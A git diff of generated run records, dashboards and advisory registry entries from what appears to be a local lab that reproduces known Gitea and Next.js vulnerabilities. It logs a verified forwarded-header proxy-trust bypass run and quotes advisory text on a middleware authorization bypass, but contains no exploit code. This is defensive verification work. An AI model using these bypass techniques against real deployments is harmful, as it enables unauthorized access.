+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-console.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-network.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-page.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof.png",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof-dom.html",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-console.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-network.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-page.json"
+      ],
+      "baseline_refs": [
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline.png",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline-dom.html",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-console.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-network.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-page.json"
+      ],
+      "proof_refs": [
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof.png",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof-dom.html",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-console.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-network.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-page.json"
+      ],
+      "baseline_title": "Gitea Proxy Boundary Fixture",
+      "proof_title": "Gitea Proxy Boundary Fixture - proof",
+      "error_kind": null,
+      "reason": null
+    },
+    "container_log_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/docker/app.log"
+    ],
+    "request_log_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/attack.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline.json"
+    ],
+    "compose_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/compose/compose.yaml"
+    ],
+    "timeline": [
+      {
+        "at": "2026-03-18T01:25:26+00:00",
+        "step": "select-advisory",
+        "status": "completed",
+        "detail": "gitea--CVE-2018-18926"
+      },
+      {
+        "at": "2026-03-18T01:25:26+00:00",
+        "step": "resolve-repro-profile",
+        "status": "completed",
+        "detail": "gitea-proxy-boundary"
+      },
+      {
+        "at": "2026-03-18T01:25:27+00:00",
+        "step": "doctor",
+        "status": "completed",
+        "detail": "all checks passed"
+      },
+      {
+        "at": "2026-03-18T01:25:41+00:00",
+        "step": "provision-compose-environment",
+        "status": "ready",
+        "detail": ""
+      },
+      {
+        "at": "2026-03-18T01:25:42+00:00",
+        "step": "wait-ready",
+        "status": "completed",
+        "detail": "baseline urls ready (1)"
+      },
+      {
+        "at": "2026-03-18T01:25:42+00:00",
+        "step": "seed-environment",
+        "status": "completed",
+        "detail": "steps=1"
+      },
+      {
+        "at": "2026-03-18T01:25:42+00:00",
+        "step": "baseline-snapshot",
+        "status": "completed",
+        "detail": "urls=1"
+      },
+      {
+        "at": "2026-03-18T01:25:42+00:00",
+        "step": "browser-replay-before-attack",
+        "status": "completed",
+        "detail": ""
+      },
+      {
+        "at": "2026-03-18T01:25:42+00:00",
+        "step": "controlled-attack-chain",
+        "status": "completed",
+        "detail": "steps=1"
+      },
+      {
+        "at": "2026-03-18T01:25:43+00:00",
+        "step": "browser-replay-after-attack",
+        "status": "completed",
+        "detail": ""
+      },
+      {
+        "at": "2026-03-18T01:25:43+00:00",
+        "step": "collect-logs-and-evidence",
+        "status": "completed",
+        "detail": "container_logs=1"
+      },
+      {
+        "at": "2026-03-18T01:25:45+00:00",
+        "step": "cleanup-compose-environment",
+        "status": "completed",
+        "detail": "docker compose down completed"
+      },
+      {
+        "at": "2026-03-18T01:25:45+00:00",
+        "step": "update-registry-and-reports",
+        "status": "completed",
+        "detail": "gitea-gitea--CVE-2018-18926-20260318012526"
+      }
+    ],
+    "success_evaluation": {
+      "passed": true,
+      "verification_status": "verified-real",
+      "blocked_reason": null,
+      "assertions": [
+        {
+          "name": "baseline-ok",
+          "kind": "baseline-ok",
+          "passed": true,
+          "detail": "baseline URLs responded without 5xx or transport errors"
+        },
+        {
+          "name": "runner-success",
+          "kind": "runner-success",
+          "passed": true,
+          "detail": "trusted forwarded headers crossed the boundary"
+        },
+        {
+          "name": "browser-present",
+          "kind": "browser-present",
+          "passed": true,
+          "detail": "browser evidence captured"
+        }
+      ]
+    },
+    "historical_status": "verified-real",
+    "latest_status": "verified-real",
+    "started_at": "2026-03-18T01:25:26+00:00",
+    "finished_at": "2026-03-18T01:25:45+00:00",
+    "blocked_reason": null,
+    "report_refs": {
+      "bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526",
+      "report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/report.md",
+      "report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/report.html",
+      "timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/timeline.mmd"
+    },
+    "dashboard_refs": {
+      "report_html": "/runs/gitea-gitea--CVE-2018-18926-20260318012526/report.html",
+      "report_md": "/runs/gitea-gitea--CVE-2018-18926-20260318012526/report.md",
+      "timeline": "/runs/gitea-gitea--CVE-2018-18926-20260318012526/timeline.mmd",
+      "bundle": "/runs/gitea-gitea--CVE-2018-18926-20260318012526/run.json"
+    },
+    "browser_links": [
+      "/runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline.png",
+      "/runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline-dom.html",
+      "/runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-console.json",
+      "/runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-network.json",
+      "/runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-page.json",
+      "/runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof.png",
+      "/runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof-dom.html",
+      "/runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-console.json",
+      "/runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-network.json",
+      "/runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-page.json"
+    ],
+    "container_links": [
+      "/runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/docker/app.log"
+    ],
+    "request_links": [
+      "/runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/attack.json",
+      "/runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline.json"
+    ],
+    "advisory_meta": {},
+    "profile_meta": {
+      "profile_id": "gitea-proxy-boundary",
+      "vuln_family": "proxy-boundary",
+      "provisioning_mode": "real",
+      "destructive_risk": "low",
+      "cleanup_policy": "destroy",
+      "artifact_source": {
+        "strategy": "local-minimal-fixture"
+      },
+      "success_criteria": [
+        "Local fixture proves trusted proxy headers cross the admin boundary."
+      ],
+      "seed_actions": [
+        {
+          "kind": "note",
+          "message": "Seed forwarded-header boundary fixture with clean state."
+        }
+      ],
+      "attack_actions": [
+        {
+          "kind": "note",
+          "message": "Runner performs local forwarded-header trust proof only inside the fixture."
+        }
+      ],
+      "browser_assertions": {
+        "required": true
+      },
+      "allowed_target_types": [
+        "lab-local"
+      ],
+      "required_services": [
+        "app"
+      ]
+    },
+    "reasoning_lines": [
+      "Seed forwarded-header boundary fixture with clean state.",
+      "Runner performs local forwarded-header trust proof only inside the fixture.",
+      "Local fixture proves trusted proxy headers cross the admin boundary."
+    ],
+    "progress": {
+      "completed": 12,
+      "skipped": 0,
+      "failed": 0,
+      "blocked": 0,
+      "planned": 0,
+      "other": 1
+    },
+    "artifact_groups": [
+      {
+        "key": "reports",
+        "label": "\u62a5\u544a\u4e0e\u8fd0\u884c\u4ea7\u7269",
+        "count": 4,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-18926-20260318012526/report.html",
+            "label": "report.html",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-18926-20260318012526/report.md",
+            "label": "report.md",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-18926-20260318012526/timeline.mmd",
+            "label": "timeline.mmd",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-18926-20260318012526/run.json",
+            "label": "run.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "compose",
+        "label": "Compose \u7f16\u6392",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-18926-20260318012526/compose/compose.yaml",
+            "label": "compose.yaml",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "baseline",
+        "label": "\u57fa\u7ebf\u5feb\u7167",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline.json",
+            "label": "baseline.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "attack",
+        "label": "\u653b\u51fb\u8f93\u51fa",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/attack.json",
+            "label": "attack.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "browser",
+        "label": "\u6d4f\u89c8\u5668\u8bc1\u636e",
+        "count": 10,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline.png",
+            "label": "baseline.png",
+            "kind": "image"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline-dom.html",
+            "label": "baseline-dom.html",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-console.json",
+            "label": "baseline-console.json",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-network.json",
+            "label": "baseline-network.json",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-page.json",
+            "label": "baseline-page.json",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof.png",
+            "label": "proof.png",
+            "kind": "image"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof-dom.html",
+            "label": "proof-dom.html",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-console.json",
+            "label": "proof-console.json",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-network.json",
+            "label": "proof-network.json",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-page.json",
+            "label": "proof-page.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "container",
+        "label": "\u5bb9\u5668\u65e5\u5fd7",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/docker/app.log",
+            "label": "app.log",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "requests",
+        "label": "\u8bf7\u6c42\u4e0e\u63a2\u6d4b\u65e5\u5fd7",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/attack.json",
+            "label": "attack.json",
+            "kind": "text"
+          }
+        ]
+      }
+    ]
+  },
   {
     "run_id": "gitea-livecheck-20260316",
     "system_id": "gitea",
@@ -102,47 +3108,7 @@
     "browser_links": [],
     "container_links": [],
     "request_links": [],
-    "advisory_meta": {
-      "canonical_id": "gitea--CVE-2025-68939",
-      "title": "Gitea allows attackers to add attachments with forbidden file extensions in code.gitea.io/gitea",
-      "summary": "Gitea allows attackers to add attachments with forbidden file extensions in code.gitea.io/gitea",
-      "display_name": "Gitea",
-      "system_id": "gitea",
-      "category": "platforms",
-      "severity": "unknown",
-      "cvss_score": null,
-      "exploit_status": "unknown",
-      "published_at": "2025-12-30T01:49:57Z",
-      "updated_at": "2026-03-03T04:57:48.777563Z",
-      "official_source_url": "https://github.com/advisories/GHSA-263q-5cv3-xq9g",
-      "secondary_source_urls": [
-        "https://nvd.nist.gov/vuln/detail/CVE-2025-68939",
-        "https://blog.gitea.com/release-of-1.23.0",
-        "https://github.com/go-gitea/gitea/pull/32151",
-        "https://github.com/go-gitea/gitea/releases/tag/v1.23.0"
-      ],
-      "aliases": [
-        "BIT-gitea-2025-68939",
-        "CVE-2025-68939",
-        "GHSA-263q-5cv3-xq9g",
-        "GO-2025-4261"
-      ],
-      "secure_code_topics": [
-        "authz-server-side-recheck",
-        "token-cookie-storage",
-        "proxy-trust-boundary",
-        "plugin-extension-trust-policy"
-      ],
-      "verification_status": "blocked-artifact",
-      "verification_mode": "real",
-      "artifact_mode": "official-image",
-      "blocked_reason": "unable to get image 'gitea/gitea:1.22.6': Cannot connect to the Docker daemon at unix:///Users/x/.docker/run/docker.sock. Is the docker daemon running?",
-      "browser_evidence": {
-        "required": false,
-        "present": false,
-        "refs": []
-      }
-    },
+    "advisory_meta": {},
     "profile_meta": {
       "profile_id": "file-upload-generic",
       "vuln_family": "file-upload",
@@ -180,11 +3146,9 @@
       ]
     },
     "reasoning_lines": [
-      "Gitea allows attackers to add attachments with forbidden file extensions in code.gitea.io/gitea",
       "Use inert marker files and non-executable payloads by default.",
       "Validate extension, storage path, and preview behavior using inert files.",
-      "Upload acceptance or bypass path is demonstrated with reversible test artifacts.",
-      "Current blocker: unable to get image 'gitea/gitea:1.22.6': Cannot connect to the Docker daemon at unix:///Users/x/.docker/run/docker.sock. Is the docker daemon running?"
+      "Upload acceptance or bypass path is demonstrated with reversible test artifacts."
     ],
     "progress": {
       "completed": 3,
@@ -273,7 +3237,7 @@
       "bundle": "/runs/gitea-gitea--CVE-2025-68939-20260317063330/run.json"
     },
     "browser_evidence": {
-      "required": false,
+      "required": true,
       "present": false,
       "refs": []
     },
@@ -283,47 +3247,7 @@
       "/runs/gitea-gitea--CVE-2025-68939-20260317063330/logs/attack.json",
       "/runs/gitea-gitea--CVE-2025-68939-20260317063330/logs/baseline.json"
     ],
-    "advisory_meta": {
-      "canonical_id": "gitea--CVE-2025-68939",
-      "title": "Gitea allows attackers to add attachments with forbidden file extensions in code.gitea.io/gitea",
-      "summary": "Gitea allows attackers to add attachments with forbidden file extensions in code.gitea.io/gitea",
-      "display_name": "Gitea",
-      "system_id": "gitea",
-      "category": "platforms",
-      "severity": "unknown",
-      "cvss_score": null,
-      "exploit_status": "unknown",
-      "published_at": "2025-12-30T01:49:57Z",
-      "updated_at": "2026-03-03T04:57:48.777563Z",
-      "official_source_url": "https://github.com/advisories/GHSA-263q-5cv3-xq9g",
-      "secondary_source_urls": [
-        "https://nvd.nist.gov/vuln/detail/CVE-2025-68939",
-        "https://blog.gitea.com/release-of-1.23.0",
-        "https://github.com/go-gitea/gitea/pull/32151",
-        "https://github.com/go-gitea/gitea/releases/tag/v1.23.0"
-      ],
-      "aliases": [
-        "BIT-gitea-2025-68939",
-        "CVE-2025-68939",
-        "GHSA-263q-5cv3-xq9g",
-        "GO-2025-4261"
-      ],
-      "secure_code_topics": [
-        "authz-server-side-recheck",
-        "token-cookie-storage",
-        "proxy-trust-boundary",
-        "plugin-extension-trust-policy"
-      ],
-      "verification_status": "blocked-artifact",
-      "verification_mode": "real",
-      "artifact_mode": "official-image",
-      "blocked_reason": "unable to get image 'gitea/gitea:1.22.6': Cannot connect to the Docker daemon at unix:///Users/x/.docker/run/docker.sock. Is the docker daemon running?",
-      "browser_evidence": {
-        "required": false,
-        "present": false,
-        "refs": []
-      }
-    },
+    "advisory_meta": {},
     "profile_meta": {
       "profile_id": "file-upload-generic",
       "vuln_family": "file-upload",
@@ -361,11 +3285,9 @@
       ]
     },
     "reasoning_lines": [
-      "Gitea allows attackers to add attachments with forbidden file extensions in code.gitea.io/gitea",
       "Use inert marker files and non-executable payloads by default.",
       "Validate extension, storage path, and preview behavior using inert files.",
-      "Upload acceptance or bypass path is demonstrated with reversible test artifacts.",
-      "Current blocker: unable to get image 'gitea/gitea:1.22.6': Cannot connect to the Docker daemon at unix:///Users/x/.docker/run/docker.sock. Is the docker daemon running?"
+      "Upload acceptance or bypass path is demonstrated with reversible test artifacts."
     ],
     "progress": {
       "completed": 0,
@@ -478,50 +3400,7 @@
       "/runs/nextjs-nextjs--CVE-2025-29927-20260317063047/logs/attack.json",
       "/runs/nextjs-nextjs--CVE-2025-29927-20260317063047/logs/baseline.json"
     ],
-    "advisory_meta": {
-      "canonical_id": "nextjs--CVE-2025-29927",
-      "title": "Authorization Bypass in Next.js Middleware",
-      "summary": "# Impact\nIt is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware.\n\n# Patches\n* For Next.js 15.x, this issue is fixed in `15.2.3`\n* For Next.js 14.x, this issue is fixed in `14.2.25`\n* For Next.js 13.x, this issue is fixed in 13.5.9\n* For Next.js 12.x, this issue is fixed in 12.3.5\n* For Next.js 11.x, consult the below workaround.\n\n_Note: Next.js deployments hosted on Vercel are automatically protected against this vulnerability._\n\n# Workaround\nIf patching to a safe version is infeasible, we recommend that you prevent external user requests which contain the `x-middleware-subrequest` header from reaching your Next.js application.\n\n## Credits\n\n- Allam Rachid (zhero;)\n- Allam Yasser (inzo_)",
-      "display_name": "Next.js",
-      "system_id": "nextjs",
-      "category": "frameworks",
-      "severity": "low",
-      "cvss_score": 3.1,
-      "exploit_status": "unknown",
-      "published_at": "2025-03-21T15:20:12Z",
-      "updated_at": "2026-03-04T15:06:29.993197Z",
-      "official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw",
-      "secondary_source_urls": [
-        "https://nvd.nist.gov/vuln/detail/CVE-2025-29927",
-        "https://github.com/vercel/next.js/commit/52a078da3884efe6501613c7834a3d02a91676d2",
-        "https://github.com/vercel/next.js/commit/5fd3ae8f8542677c6294f32d18022731eab6fe48",
-        "https://github.com/vercel/next.js",
-        "https://github.com/vercel/next.js/releases/tag/v12.3.5",
-        "https://github.com/vercel/next.js/releases/tag/v13.5.9",
-        "https://security.netapp.com/advisory/ntap-20250328-0002",
-        "https://vercel.com/changelog/vercel-firewall-proactively-protects-against-vulnerability-with-middleware",
-        "http://www.openwall.com/lists/oss-security/2025/03/23/3",
-        "http://www.openwall.com/lists/oss-security/2025/03/23/4"
-      ],
-      "aliases": [
-        "CVE-2025-29927",
-        "GHSA-f82v-jwr5-mffw"
-      ],
-      "secure_code_topics": [
-        "authz-server-side-recheck",
-        "proxy-trust-boundary",
-        "token-cookie-storage"
-      ],
-      "verification_status": "triage-manual",
-      "verification_mode": "real",
-      "artifact_mode": "official-source",
-      "blocked_reason": "dry-run only",
-      "browser_evidence": {
-        "required": false,
-        "present": false,
-        "refs": []
-      }
-    },
+    "advisory_meta": {},
     "profile_meta": {
       "profile_id": "authz-bypass-generic",
       "vuln_family": "authz-bypass",
@@ -559,11 +3438,9 @@
       ]
     },
     "reasoning_lines": [
-      "# Impact\nIt is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware.\n\n# Patches\n* For Next.js 15.x, this issue is fixed in `15.2.3`\n* For Next.js 14.x, this issue is fixed in `14.2.25`\n* For Next.js 13.x, this issue is fixed in 13.5.9\n* For Next.js 12.x, this issue is fixed in 12.3.5\n* For Next.js 11.x, consult the below workaround.\n\n_Note: Next.js deployments hosted on Vercel are automatically protected against this vulnerability._\n\n# Workaround\nIf patching to a safe version is infeasible, we recommend that you prevent external user requests which contain the `x-middleware-subrequest` header from reaching your Next.js application.\n\n## Credits\n\n- Allam Rachid (zhero;)\n- Allam Yasser (inzo_)",
       "Create low-privilege and admin test users for server-side recheck validation.",
       "Use minimal authorization bypass probes defined by case-specific runner or manual session tooling.",
-      "Protected route or action is evaluated with controlled credentials and logged.",
-      "Current blocker: dry-run only"
+      "Protected route or action is evaluated with controlled credentials and logged."
     ],
     "progress": {
       "completed": 0,
diff --git a/08-threat-intel/generated/dashboard/summary.json b/08-threat-intel/generated/dashboard/summary.json
index f08a5ec5..0522a856 100644
--- a/08-threat-intel/generated/dashboard/summary.json
+++ b/08-threat-intel/generated/dashboard/summary.json
@@ -1,8 +1,9 @@
 {
-  "generated_at": "2026-03-17T12:57:54+00:00",
-  "advisory_count": 89,
-  "run_count": 3,
+  "generated_at": "2026-03-18T01:29:52+00:00",
+  "advisory_count": 80,
+  "run_count": 11,
   "statuses": {
+    "verified-real": 8,
     "blocked-artifact": 2,
     "triage-manual": 1
   },
@@ -11,21 +12,21 @@
       "run_id": "gitea-livecheck-20260316",
       "advisory_id": "gitea--CVE-2025-68939",
       "status": "blocked-artifact",
-      "title": "Gitea allows attackers to add attachments with forbidden file extensions in code.gitea.io/gitea",
+      "title": null,
       "blocked_reason": "unable to get image 'gitea/gitea:1.22.6': Cannot connect to the Docker daemon at unix:///Users/x/.docker/run/docker.sock. Is the docker daemon running?"
     },
     {
       "run_id": "gitea-gitea--CVE-2025-68939-20260317063330",
       "advisory_id": "gitea--CVE-2025-68939",
       "status": "blocked-artifact",
-      "title": "Gitea allows attackers to add attachments with forbidden file extensions in code.gitea.io/gitea",
+      "title": null,
       "blocked_reason": "unable to get image 'gitea/gitea:1.22.6': Cannot connect to the Docker daemon at unix:///Users/x/.docker/run/docker.sock. Is the docker daemon running?"
     },
     {
       "run_id": "nextjs-nextjs--CVE-2025-29927-20260317063047",
       "advisory_id": "nextjs--CVE-2025-29927",
       "status": "triage-manual",
-      "title": "Authorization Bypass in Next.js Middleware",
+      "title": null,
       "blocked_reason": "dry-run only"
     }
   ],
@@ -33,11 +34,11 @@
     {
       "system_id": "gitea",
       "display_name": "Gitea",
-      "total": 37,
+      "total": 30,
       "verified_real": 0,
       "verified_synthetic": 0,
-      "blocked": 1,
-      "manual": 36,
+      "blocked": 0,
+      "manual": 30,
       "browser_required": 0,
       "browser_present": 0,
       "latest_update": "2026-03-03T04:57:57.697708Z",
@@ -48,14 +49,14 @@
     {
       "system_id": "nextjs",
       "display_name": "Next.js",
-      "total": 26,
-      "verified_real": 0,
+      "total": 24,
+      "verified_real": 1,
       "verified_synthetic": 0,
       "blocked": 0,
-      "manual": 26,
+      "manual": 23,
       "browser_required": 0,
       "browser_present": 0,
-      "latest_update": "2026-03-13T22:14:13.665535Z",
+      "latest_update": "2026-03-13T22:00:36.554552Z",
       "category": "frameworks",
       "tier": "history-full",
       "output_dir": "07-framework-security/frameworks/nextjs"
diff --git a/08-threat-intel/generated/dashboard/systems.json b/08-threat-intel/generated/dashboard/systems.json
index 43b94eaa..ed79191c 100644
--- a/08-threat-intel/generated/dashboard/systems.json
+++ b/08-threat-intel/generated/dashboard/systems.json
@@ -2,11 +2,11 @@
   {
     "system_id": "gitea",
     "display_name": "Gitea",
-    "total": 37,
+    "total": 30,
     "verified_real": 0,
     "verified_synthetic": 0,
-    "blocked": 1,
-    "manual": 36,
+    "blocked": 0,
+    "manual": 30,
     "browser_required": 0,
     "browser_present": 0,
     "latest_update": "2026-03-03T04:57:57.697708Z",
@@ -17,14 +17,14 @@
   {
     "system_id": "nextjs",
     "display_name": "Next.js",
-    "total": 26,
-    "verified_real": 0,
+    "total": 24,
+    "verified_real": 1,
     "verified_synthetic": 0,
     "blocked": 0,
-    "manual": 26,
+    "manual": 23,
     "browser_required": 0,
     "browser_present": 0,
-    "latest_update": "2026-03-13T22:14:13.665535Z",
+    "latest_update": "2026-03-13T22:00:36.554552Z",
     "category": "frameworks",
     "tier": "history-full",
     "output_dir": "07-framework-security/frameworks/nextjs"
diff --git a/08-threat-intel/generated/latest-ingest.md b/08-threat-intel/generated/latest-ingest.md
index f6d7d1a6..ca30c3cb 100644
--- a/08-threat-intel/generated/latest-ingest.md
+++ b/08-threat-intel/generated/latest-ingest.md
@@ -1,10 +1,10 @@
 # 最新同步摘要
 
-- 渲染时间: `2026-03-17T12:57:27+00:00`
+- 渲染时间: `2026-03-18T01:29:52+00:00`
 - 系统数量: `62`
-- Advisory 数量: `89`
-- 重点 Markdown 数量: `89`
-- Run Bundle 数量: `2`
+- Advisory 数量: `80`
+- 重点 Markdown 数量: `80`
+- Run Bundle 数量: `10`
 - 新增记录: `0`
 - 更新记录: `0`
 - Triage 数量: `0`
diff --git a/08-threat-intel/generated/run-summary.json b/08-threat-intel/generated/run-summary.json
index 1df9393b..1017d299 100644
--- a/08-threat-intel/generated/run-summary.json
+++ b/08-threat-intel/generated/run-summary.json
@@ -1,13 +1,13 @@
 {
-  "generated_at": "2026-03-17T12:57:27+00:00",
+  "generated_at": "2026-03-18T01:29:52+00:00",
   "system_count": 62,
-  "advisory_count": 89,
-  "markdown_count": 89,
+  "advisory_count": 80,
+  "markdown_count": 80,
   "new_count": 0,
   "updated_count": 0,
   "systems_touched": [],
   "triage_count": 0,
-  "run_bundle_count": 2,
+  "run_bundle_count": 10,
   "failures": [
     "wordpress::NVD WordPress::SSLError",
     "wordpress::WPScan Vulnerability Database::SSLError",
diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2018-15192.json b/08-threat-intel/registry/advisories/gitea--CVE-2018-15192.json
deleted file mode 100644
index dc7e4744..00000000
--- a/08-threat-intel/registry/advisories/gitea--CVE-2018-15192.json
+++ /dev/null
@@ -1,80 +0,0 @@
-{
-  "canonical_id": "gitea--CVE-2018-15192",
-  "system_id": "gitea",
-  "display_name": "Gitea",
-  "category": "platforms",
-  "advisory_mode": "core",
-  "title": "Gogs and Gitea SSRF Vulnerability in code.gitea.io/gitea",
-  "summary": "Gogs and Gitea SSRF Vulnerability in code.gitea.io/gitea",
-  "published_at": "2024-08-20T20:32:20Z",
-  "updated_at": "2026-03-03T04:54:04.686907Z",
-  "severity": "unknown",
-  "cvss_score": null,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/advisories/GHSA-fg3x-rwq9-74cw",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2018-15192",
-    "https://github.com/go-gitea/gitea/commit/599ff1c054e436daa4dc3f049aa8661d9c2395f9",
-    "https://github.com/go-gitea/gitea/issues/4624",
-    "https://github.com/go-gitea/gitea/pull/17482",
-    "https://github.com/gogs/gogs/commit/22717a1c064511cf37c46af5e650baf7184cf25b",
-    "https://github.com/gogs/gogs/issues/5366",
-    "https://github.com/gogs/gogs/pull/6002"
-  ],
-  "aliases": [
-    "CVE-2018-15192",
-    "GHSA-fg3x-rwq9-74cw",
-    "GO-2023-1971"
-  ],
-  "cve_ids": [
-    "CVE-2018-15192"
-  ],
-  "ghsa_ids": [
-    "GHSA-fg3x-rwq9-74cw"
-  ],
-  "osv_ids": [
-    "GO-2023-1971"
-  ],
-  "affected_versions": [
-    "introduced=0, fixed<1.16.0-rc1",
-    "introduced=0, fixed<0.12.0"
-  ],
-  "fixed_versions": [
-    "1.16.0-rc1",
-    "0.12.0"
-  ],
-  "package_name": "code.gitea.io/gitea",
-  "render_markdown": true,
-  "case_path": "07-framework-security/platforms/gitea/cases/gitea-cve-2018-15192.md",
-  "secure_code_topics": [
-    "authz-server-side-recheck",
-    "token-cookie-storage",
-    "proxy-trust-boundary",
-    "ssrf-url-validation"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "ssrf-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Gitea"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2018-18926.json b/08-threat-intel/registry/advisories/gitea--CVE-2018-18926.json
deleted file mode 100644
index c02aa5b1..00000000
--- a/08-threat-intel/registry/advisories/gitea--CVE-2018-18926.json
+++ /dev/null
@@ -1,74 +0,0 @@
-{
-  "canonical_id": "gitea--CVE-2018-18926",
-  "system_id": "gitea",
-  "display_name": "Gitea",
-  "category": "platforms",
-  "advisory_mode": "core",
-  "title": "Gitea Remote Code Execution (RCE) in code.gitea.io/gitea",
-  "summary": "Gitea Remote Code Execution (RCE) in code.gitea.io/gitea",
-  "published_at": "2024-08-21T15:29:04Z",
-  "updated_at": "2026-03-03T04:52:20.787387Z",
-  "severity": "unknown",
